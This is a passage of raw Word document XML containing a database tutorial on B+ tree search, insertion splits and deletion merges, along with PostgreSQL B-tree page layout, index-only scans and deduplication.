    </w:p>
    <w:p w14:paraId="27317DEC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="30B87EB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Leaf nodes: [key1 | rowptr1 | key2 | rowptr2 | ...] ↔ [key_n | rowptr_n | ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1B388" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Linked list: leaf1 ↔ leaf2 ↔ leaf3 ↔ ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB130B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A69AD1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Range scan for 100 ≤ x ≤ 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E48ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Traverse tree to find first leaf containing key ≥ 100 (O(log N))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30906F76" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Scan forward through linked leaf nodes until key &gt; 200 (O(range_size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010C0A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Total: O(log N + range_size) — efficient for any range size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBBCF1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>B+ Tree Internal Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79055C74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search — O(log N) page reads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB8D4EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CDCC56" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>search(key k):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7024CE37" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  node = root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F07FF0D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  while node is not leaf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D0854C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    i = binary_search(node.keys, k)  // find rightmost key ≤ k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96537B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    node = load_page(node.pointers[i])  // follow pointer (page read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540D693B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  i = binary_search(node.keys, k)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218ACFAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  if node.keys[i] == k:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E187B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    return node.row_pointers[i]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E1176" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  return NOT_FOUND</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C08920" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="13595F61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page reads: tree_height (typically 3-4 for production tables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ACC9AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insertion — the split operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC1EFF5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F3204" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>insert(key k, row_ptr r):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCE9D25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Find target leaf node L via search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606F582D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  if L has space:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9697FB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    insert (k, r) into L in sorted order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5145A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    write L back to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA3731" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  else:  // L is full — must split</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5421B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    split L into L and L':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489DB422" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      L  contains first </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌈</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>m/2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌉</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6514499A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      L' contains remaining entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56587D33" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7E8B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    promote median key to parent node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F37907E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      insert median_key and ptr_to_L' into parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF0DB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      if parent is full: recursively split parent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ADD416" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      if root splits: create new root (tree height increases by 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE293C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70A317" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Update linked list: L.next = L', L'.prev = L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D56FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The split cascade:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> In the worst case, a single insertion causes a cascade of splits from leaf to root, increasing tree height. This is rare for well-sized pages (most inserts find space in the target leaf) but represents the worst-case write amplification: O(height) page writes for a single insert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6EF323" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deletion — the merge/redistribute operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27726DA4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>When a leaf node falls below the minimum occupancy (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌈</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>m/2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⌉</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> keys), it must either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE503F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Borrow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> from an adjacent sibling (redistribute keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD52CCF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1486"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Merge</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> with a sibling (combine into one node, remove parent pointer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24EF91" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Merges can cascade upward, potentially reducing tree height. In practice, databases often use </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lazy deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — mark entries as deleted without immediately compacting nodes. Periodic vacuum/reorganization reclaims space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40077CDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL B-Tree Specifics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4E3FC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Page layout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F12A5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2AB1F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL B-Tree page (8KB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B715E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Page header:     24 bytes (LSN, checksum, flags, number of items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A590A53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Item pointers:   4 bytes each (offset + length of each index entry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EDF08F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Free space:      variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6732990E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index entries:   variable length (key bytes + item pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2698B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Special space:   16 bytes (left/right sibling page numbers, level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD43CD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="21DEE677" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For a simple int8 index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C38A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Entry size: 8 bytes (key) + 6 bytes (heap tuple ID) = 14 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445614D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Effective page capacity: (8192 - 24 - 16) / (14 + 4) ≈ 453 entries per page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A6289" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Branching factor: ~453</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52E0DC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Pages for 100M rows: ~220,000 index pages = ~1.8GB index size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F892F82" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The visibility map and index-only scans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF09B64" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL's heap is MVCC-based — multiple versions of rows coexist. An index entry points to a specific tuple version. When an index scan finds an entry, it must check the heap to determine if the tuple is visible to the current transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45862D42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Index-only scan optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> If all query columns are in the index (covering index) AND the page is known to be fully visible (all tuples on the page are visible to all current transactions — tracked by the visibility map), the index entry can be returned without touching the heap at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47832653" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6226D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT age FROM users WHERE name = 'Alice'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09786358" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index: CREATE INDEX ON users(name, age)  -- covering index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87CFA7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="77362BB5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">Without index-only scan: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437AA20" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  index lookup → find heap tuple ID → heap page fetch → return age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168672B5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  I/O: 1 index leaf page + 1 heap page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEB3E94" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="61CC8FC7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>With index-only scan (visibility map confirms clean):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4A13A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  index lookup → return age directly from index entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A2967" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  I/O: 1 index leaf page only (50% I/O reduction for this query pattern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68332DA8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deduplication (PostgreSQL 13+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B6CB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>For indexes with many duplicate key values (e.g., a boolean column, a status column), each duplicate value traditionally gets its own index entry. An index on a column with 10 distinct values across 10 million rows has 1 million entries per distinct value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A354992" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deduplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> merges multiple index entries with the same key into a single posting list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79543144" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF2E5A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Without deduplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6028EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  [status='active' | tuple_id_1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360F0B54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  [status='active' | tuple_id_2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A325953" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  [status='active' | tuple_id_3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7899ADC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ... (millions of entries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB8E78" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="628564D6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>With deduplication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A5E61" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  [status='active' | [tuple_id_1, tuple_id_2, tuple_id_3, ...]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8373A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (one entry per distinct key value, with a list of tuple IDs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF87AED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0390A4DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
